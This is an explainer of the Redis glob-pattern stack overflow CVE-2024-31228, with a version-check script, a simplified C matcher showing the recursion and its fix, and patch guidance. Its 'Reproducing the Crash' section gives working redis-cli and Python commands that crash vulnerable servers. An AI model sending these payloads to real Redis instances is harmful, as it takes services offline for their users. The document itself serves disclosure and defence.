CVE-2024-31228 - Redis Stack Overflow Exploit—How a Simple Pattern Can Crash Your Database
Redis powers countless apps with its blazing speed and simplicity. But sometimes, the simplest parts of a system can be its undoing. That’s exactly what happened with CVE-2024-31228, a vulnerability that lets authenticated users crash Redis using nothing more than an evil search pattern. Let’s break down exactly how this denial-of-service (DoS) bug works, how you can check for it, and what to do now.
What Is CVE-2024-31228?
Redis is an open source, in-memory database. You get super-fast access and a host of convenient commands for storing, searching, and managing data. But in 2024 a flaw was reported in one of those conveniences, glob-style pattern matching:
- Commands such as KEYS, SCAN (its MATCH option), PSUBSCRIBE, FUNCTION LIST (LIBRARYNAME), COMMAND LIST (FILTERBY PATTERN) and the ACL key and channel selectors all accept string matching patterns.
- All of them go through the same matcher, and its handling of the * wildcard is recursive. If an *authenticated user* supplies a specially crafted, extremely long pattern, nothing bounds how deep that recursion goes.
- Deep enough recursion exhausts the stack (a stack overflow), and the whole Redis process crashes.
This means any user who can authenticate can take your Redis instance down, and it stays down until something restarts the process.
How the Bug Works
The core of this bug is how Redis matches glob-style patterns. The commands involved are:
- KEYS pattern
- SCAN cursor MATCH pattern
- PSUBSCRIBE pattern
- FUNCTION LIST LIBRARYNAME pattern
- COMMAND LIST FILTERBY PATTERN pattern
- ACL pattern definitions for user permissions (the ~key and &channel selectors)
All of them call the same routine, stringmatchlen() in src/util.c. Its handling of the * wildcard is recursive: for each candidate position in the string being matched, it calls itself on the remainder of the pattern. Before the fix nothing bounded that depth, so a pattern with enough wildcards, matched against a key or channel name long enough to advance through them, costs one stack frame per wildcard until the stack runs out. What matters is the number of wildcards the matcher passes through, not pattern length as such: literals, ? and [...] classes are consumed iteratively.
Reproducing the Crash: Example Exploit
WARNING: The following details are for educational purposes only.
Suppose you have access to a vulnerable Redis server (one older than the fixed release for its branch: 6.2.16, 7.2.6 or 7.4.1). Use a disposable instance, because the goal is to crash it.
Try the following from a bash shell (redis-cli takes the password from REDISCLI_AUTH, or pass -a):
# A key name long enough for the matcher to advance through (100,000 'a's),
# then a pattern of 100,000 "*?" pairs; every "*" the matcher passes costs a stack frame.
redis-cli SET "$(printf 'a%.0s' {1..100000})" x
redis-cli KEYS "$(printf '*?%.0s' {1..100000})"
The SET creates a key whose name is 100,000 'a' characters; the KEYS pattern is 100,000 repetitions of *? (200,000 characters in total). Matching that pattern against that key name, the matcher recurses once for every * it passes, one per 'a', so the call stack grows to 100,000 frames. Whether that is enough to exhaust the stack depends on the stack size limit the Redis process runs under (8 MB is a common default); if the server survives, raise both counts. On a vulnerable build the process dies with a stack overflow and every client's connection drops.
Python version (redis-py):
import redis

# Connect as an authenticated user (the password is only needed if requirepass or ACLs are set).
client = redis.Redis(host='localhost', port=6379, password='yourpassword')

# A key name for the matcher to advance through, then a pattern of 100,000 "*?" pairs:
# every "*" the matcher passes costs one stack frame.
client.set('a' * 100000, 'x')
long_pattern = '*?' * 100000

# On a vulnerable build this call never returns: the server crashes.
print(client.keys(long_pattern))
*On a vulnerable build the Redis process crashes and the call never returns. A patched build answers normally: the matcher gives up once nesting passes its cap, so the pattern simply does not match.*
Note: You need to be authenticated (if requirepass or ACL users are configured), and the user's ACL must allow KEYS and SET, for the exploit to work.
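Before pointing anything like the above at a server, the check most teams actually want is a non-destructive one: read the version Redis reports and compare it with the fixed releases. The script below is an added example written for this page, not a tool from the Redis project. It assumes redis-cli is on the path and that INFO server reports a redis_version field. How it treats release lines the advisory does not list (7.0.x and older lines as vulnerable, lines newer than 7.4 as fixed) is this script's assumption, not a statement from the advisory.

```shell
#!/bin/sh
# Non-destructive check for CVE-2024-31228: compare the server's reported
# version against the releases the advisory lists as fixed (6.2.16, 7.2.6,
# 7.4.1) instead of sending a crashing pattern.
# Added example for this page, not a script from the Redis project.
# Assumption (ours, not the advisory's): release lines the advisory does not
# list are reported as vulnerable when older than 7.4 (e.g. 7.0.x, 6.0.x)
# and as fixed when newer.

# cve_2024_31228_status VERSION
# Prints "fixed" or "vulnerable"; returns 1 when vulnerable, 2 when the
# version string is empty (server unreachable or INFO unavailable).
cve_2024_31228_status() {
    v=$1
    [ -z "$v" ] && { echo unknown; return 2; }
    major=${v%%.*}
    case "$v" in *.*) rest=${v#*.} ;; *) rest=0 ;; esac
    minor=${rest%%.*}
    case "$rest" in *.*) patch=${rest#*.} ;; *) patch=0 ;; esac
    patch=${patch%%[!0-9]*}            # strip suffixes such as "-rc1"
    patch=${patch:-0}

    case "$major.$minor" in
        6.2) fixed_patch=16 ;;
        7.2) fixed_patch=6 ;;
        7.4) fixed_patch=1 ;;
        *)
            # Not a branch the advisory names: newer than 7.4 is fixed,
            # anything older (7.0.x, 6.0.x, ...) has no fix on its branch.
            if [ "$major" -gt 7 ] || { [ "$major" -eq 7 ] && [ "$minor" -gt 4 ]; }; then
                echo fixed; return 0
            fi
            echo vulnerable; return 1 ;;
    esac
    if [ "$patch" -ge "$fixed_patch" ]; then
        echo fixed; return 0
    fi
    echo vulnerable; return 1
}

# redis_version [redis-cli options]
# Reads redis_version from INFO server; pass -h/-p as needed and set
# REDISCLI_AUTH rather than putting the password on the command line.
redis_version() {
    redis-cli "$@" INFO server | tr -d '\r' | sed -n 's/^redis_version://p'
}

# Usage: REDISCLI_AUTH=... sh check.sh --check -h redis.example.internal -p 6379
if [ "${1:-}" = "--check" ]; then
    shift
    cve_2024_31228_status "$(redis_version "$@")"
fi
```

The exit status is 1 on a vulnerable server, so the script drops into a fleet-wide loop over hosts without any parsing of its output. The hostname in the usage line is a placeholder.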
What Makes This Impactful?
- No clean workaround: the matcher is shared by every pattern-taking command and by the ACL key and channel checks, so there is no single thing to block. You can narrow exposure by denying KEYS, SCAN, PSUBSCRIBE, FUNCTION LIST and COMMAND LIST to untrusted ACL users, but if you run an affected version and let authenticated users connect, the fix is upgrading.
- Easy to trigger: only requires authenticated access and a crafted pattern string.
- Denial-of-service: not remote code execution, but still a big deal if your services rely on a stable Redis instance.
How Was It Fixed?
Redis maintainers patched the bug by capping the recursion depth in stringmatchlen(): a match that would nest deeper than the limit is treated as no match instead of recursing further, so the worst a crafted pattern can now do is fail to match. The fix shipped in:
- 6.2.16
- 7.2.6
- 7.4.1
If you're on an earlier version of any of these branches, upgrade ASAP. Redis 7.0 is not on that list; if you are still running it, move to 7.2 or 7.4.
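The recursion described under "How the Bug Works" and the depth cap described under "How Was It Fixed?" are easiest to see side by side in code. The block below is an added example written for this page: a simplified matcher modelled on Redis's stringmatchlen() in src/util.c, not Redis's own source. The *? pattern, the all-'a' subject and the probe_depth instrumentation are constructed for the demonstration; the limit parameter plays the role of the nesting cap the fixed releases apply (Redis uses 1000), and limit 0 reproduces the unbounded pre-fix behaviour.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified glob matcher modelled on Redis's stringmatchlen() (src/util.c):
 * '*', '?', '[...]' classes with '^' negation and ranges, '\' escapes.
 * Added example for this page, not Redis's own code.
 * The only self-call is in the '*' branch: for each candidate position in
 * the subject it recurses on the rest of the pattern, so every '*' the
 * matcher advances through costs one stack frame. limit == 0 reproduces the
 * unbounded (vulnerable) behaviour; limit > 0 refuses deeper recursion, the
 * shape of the fix. 'skip' mirrors Redis's early-termination flag (stops
 * exponential backtracking); 'maxdepth' is instrumentation for this example. */
static int match_impl(const char *p, int plen, const char *s, int slen,
                      int limit, int nesting, int *skip, int *maxdepth)
{
    if (nesting > *maxdepth) *maxdepth = nesting;
    if (limit > 0 && nesting > limit) return 0;            /* the fix */

    while (plen && slen) {
        switch (p[0]) {
        case '*':
            while (plen > 1 && p[1] == '*') { p++; plen--; }  /* "**" -> "*" */
            if (plen == 1) return 1;                       /* trailing '*' */
            while (slen) {                                 /* the recursive path */
                if (match_impl(p + 1, plen - 1, s, slen, limit, nesting + 1, skip, maxdepth))
                    return 1;
                if (*skip) return 0;
                s++; slen--;
            }
            *skip = 1;   /* rest of pattern matches nowhere in rest of subject */
            return 0;
        case '?':
            s++; slen--; break;
        case '[': {                                        /* iterative, no recursion */
            int neg, found = 0;
            p++; plen--;
            neg = (plen > 0 && p[0] == '^');
            if (neg) { p++; plen--; }
            for (;;) {
                if (plen == 0) { p--; plen++; break; }     /* unterminated class */
                if (p[0] == ']') break;
                if (p[0] == '\\' && plen >= 2) {
                    p++; plen--;
                    if (p[0] == s[0]) found = 1;
                } else if (plen >= 3 && p[1] == '-') {
                    char lo = p[0], hi = p[2];
                    if (lo > hi) { char t = lo; lo = hi; hi = t; }
                    if (s[0] >= lo && s[0] <= hi) found = 1;
                    p += 2; plen -= 2;
                } else if (p[0] == s[0]) {
                    found = 1;
                }
                p++; plen--;
            }
            if (neg) found = !found;
            if (!found) return 0;
            s++; slen--; break;
        }
        case '\\':
            if (plen >= 2) { p++; plen--; }
            /* fall through */
        default:                                           /* literal character */
            if (p[0] != s[0]) return 0;
            s++; slen--; break;
        }
        p++; plen--;
        if (slen == 0) {                                   /* only trailing '*' may remain */
            while (plen && p[0] == '*') { p++; plen--; }
            break;
        }
    }
    return plen == 0 && slen == 0;
}

/* 1 on match, 0 otherwise. limit 0 = unbounded (vulnerable), >0 = capped (fixed). */
int match(const char *pattern, const char *subject, int limit)
{
    int skip = 0, depth = 0;
    return match_impl(pattern, (int)strlen(pattern), subject, (int)strlen(subject),
                      limit, 0, &skip, &depth);
}

/* Constructed worst case (made up for this example): n "*?" pairs matched
 * against a subject of subject_len 'a's. Returns the deepest nesting reached. */
int probe_depth(int n, int subject_len, int limit)
{
    char *pat = malloc((size_t)2 * n + 1), *sub = malloc((size_t)subject_len + 1);
    int skip = 0, depth = 0, i;
    if (!pat || !sub) { free(pat); free(sub); return -1; }
    for (i = 0; i < n; i++) { pat[2 * i] = '*'; pat[2 * i + 1] = '?'; }
    pat[2 * n] = '\0';
    memset(sub, 'a', (size_t)subject_len);
    sub[subject_len] = '\0';
    match_impl(pat, 2 * n, sub, subject_len, limit, 0, &skip, &depth);
    free(pat); free(sub);
    return depth;
}

int main(void)
{
    /* Depth tracks min(wildcards, subject length). Pushing n into the hundreds
     * of thousands with limit 0 overflows the stack here as it did in Redis. */
    printf("uncapped: depth %d\n", probe_depth(2000, 2000, 0));           /* 2000 */
    printf("capped at 1000: depth %d, match %d\n",
           probe_depth(2000, 2000, 1000), match("*?*?*?*?*?", "aaaaa", 3));  /* 1001, 0 */
    return 0;
}
```

probe_depth(5, 5, 0) reaches depth 5 while probe_depth(5, 2, 0) only reaches 2: the depth is the smaller of the wildcard count and the subject length, which is why an attacker needs both a wildcard-heavy pattern and something long for it to match against. With a cap, the same inputs stop at limit + 1 and the matcher reports no match instead of growing the stack.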
Official References
- Redis Security Advisory (CVE-2024-31228)
- GitHub Redis Issue #13037
- CVE Details Entry
- Upstream Patch
Conclusion
CVE-2024-31228 may seem like an esoteric bug, but it reminds us how even basic string-matching can take down world-class software like Redis. Keep your software up to date! And as always, keep a close eye on what your users are allowed to do.
Stay safe, and upgrade your Redis!
Timeline
Published on: 10/07/2024 20:15:05 UTC
Last modified on: 10/10/2024 12:57:21 UTC